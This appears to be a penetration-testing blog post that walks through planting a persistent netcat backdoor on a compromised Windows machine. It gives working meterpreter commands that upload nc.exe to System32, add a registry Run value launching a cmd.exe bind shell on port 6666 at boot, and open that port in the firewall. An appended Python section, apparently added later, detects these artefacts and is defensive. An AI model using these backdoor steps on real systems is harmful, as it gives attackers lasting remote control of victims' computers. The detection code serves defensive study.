Install Netcat backdoor on Windows machine

nc is the command which runs netcat, a simple Unix utility that reads and writes data across network connections, using the TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Common uses include:

  • Simple TCP proxies
  • Shell-script based HTTP clients and servers
  • Network daemon testing
  • A Socks or HTTP ProxyCommand for ssh

For details on how to use netcat, please read this article.

In this post, I am going to show you how to install a netcat backdoor on a Windows machine so that the target machine can be accessed at any time. This step belongs to the maintaining-access phase of your penetration test.

https://www.youtube.com/watch?v=tWIa-MYz7x8

Commands:

1. Upload nc.exe to the victim

meterpreter > getsystem
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\System32

2. Use meterpreter to modify the registry so that netcat runs at system boot

meterpreter > reg setval -k HKLM\\software\\microsoft\\currentversion\\run -v netcat -d 'C:\\Windows\\System32\\nc.exe -Ldp 6666 -e cmd.exe'

3. Configure the firewall to open port 6666

meterpreter > shell
C:\Windows\system32 > netsh firewall
C:\Windows\system32 > netsh firewall show opmode
C:\Windows\system32 > netsh firewall show portopening
C:\Windows\system32 > netsh advfirewall firewall add rule name="netcat" dir=in action=allow protocol=TCP localport=6666
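
The steps above leave two artefacts on the host: an autorun value in the registry and an inbound allow rule in the firewall. The following Python check is an added example, not part of the original post: it parses constructed `reg query` and `netsh advfirewall firewall show rule` output, flags Run values that start a listener handing its socket to a command interpreter, and lists inbound allow rules for the same port. The function names and sample output are assumptions made for illustration.

```python
import re

# Constructed sample of: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    netcat    REG_SZ    C:\Windows\System32\nc.exe -Ldp 6666 -e cmd.exe
"""
# Constructed sample of: netsh advfirewall firewall show rule name=all
# (trimmed to the fields this check reads)
FW_OUTPUT = """
Rule Name:                            netcat
----------------------------------------------------------------------
Direction:                            In
LocalPort:                            6666
Action:                               Allow

Rule Name:                            Remote Desktop (TCP-In)
----------------------------------------------------------------------
Direction:                            In
LocalPort:                            3389
Action:                               Allow
"""
RUN_VALUE = re.compile(r"^\s+(\S.*?)\s{4}(REG_\w+)\s{4}(.+)$")
# Option cluster containing both l/L (listen) and p, followed by the port.
LISTEN = re.compile(r"\s-(?=[a-z]*l)[a-z]*p[a-z]*\s+(\d{1,5})\b", re.I)
# -e handing the socket to a command interpreter.
SHELL = re.compile(r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)

def parse_run_values(text):
    return {m[1]: m[3] for m in map(RUN_VALUE.match, text.splitlines()) if m}

def parse_fw_rules(text):
    blocks = re.split(r"\n\s*\n", text.strip())
    return [dict(re.findall(r"^([^:\n]+):[ \t]+(.*)$", b, re.M)) for b in blocks]

def audit(reg_text, fw_text):
    """Return Run values that start a listening shell, with matching inbound allow rules."""
    rules, findings = parse_fw_rules(fw_text), []
    for name, cmd in parse_run_values(reg_text).items():
        listen = LISTEN.search(cmd)
        if not (listen and SHELL.search(cmd)):
            continue
        port = listen.group(1)
        opened = [r.get("Rule Name") for r in rules
                  if r.get("Direction") == "In" and r.get("Action") == "Allow"
                  and port in re.split(r"\s*,\s*", r.get("LocalPort", ""))]
        findings.append({"value": name, "port": int(port), "fw_rules": opened})
    return findings
```

A finding with a non-empty `fw_rules` list means both the autorun entry and the firewall opening are present; an empty list means the listener is configured but no matching inbound allow rule was found.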